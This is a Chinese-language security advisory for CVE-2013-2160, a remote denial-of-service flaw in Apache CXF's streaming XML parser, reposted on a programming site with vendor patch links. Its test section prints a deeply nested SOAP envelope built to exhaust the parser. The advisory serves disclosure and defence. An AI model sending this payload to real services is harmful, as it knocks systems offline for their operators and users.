发布日期:2013-07-09
更新日期:2013-07-11受影响系统:
Apache Group CXF <= 2.5.10
Apache Group CXF 2.7.4
Apache Group CXF 2.6.7
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61030
CVE(CAN) ID: CVE-2013-2160Apache CXF是一个开源服务框架,用于使用JAX-WS、JAX-RS等前端编程API编译和开发服务。Apache CXF 2.5.10, 2.6.7, 2.7.4存在多个远程拒绝服务漏洞,流XML解析器没有限制元素数、属性数、接收文档嵌套结构等,攻击者利用这些漏洞可造成应用崩溃,导致拒绝服务。<*来源:Andreas Falkenberg
Juraj Somorovsky
链接:http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc?version=1&modificationDate=1372
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.example.com/2003/05/soap-envelope";>
<soap:Body>
<element>
<element>
<element>
<element>
[thousands more]
</element>
</element>
</element>
</element>
</soap:Body>
</soap:Envelope>建议:
--------------------------------------------------------------------------------
厂商补丁:Apache Group
------------
Apache Group已经为此发布了一个安全公告(CVE-2013-2160)以及相应补丁:
CVE-2013-2160:Denial of Service Attacks on Apache CXF
链接:http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc?version=1&modificationDate=1372Linux kernel net/ceph/auth_none.c拒绝服务漏洞Adobe ColdFusion远程拒绝服务漏洞(CVE-2013-3349)相关资讯 Apache CXF
- Apache CXF 3.0.2/2.7.13/2.6.16 (11/18/2014 15:35:39)
- Apache CXF 拒绝服务漏洞(CVE-2014 (10/29/2014 18:03:36)
- Apache CXF快速入门基础教程 (05/07/2014 15:35:40)
| - Apache CXF SAML SubjectConfirmat (10/29/2014 18:08:19)
- Apache CXF远程拒绝服务漏洞(CVE- (05/08/2014 16:15:10)
- Apache CXF远程拒绝服务漏洞(CVE- (05/07/2014 15:21:36)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
<
|
易网时代-编程资源站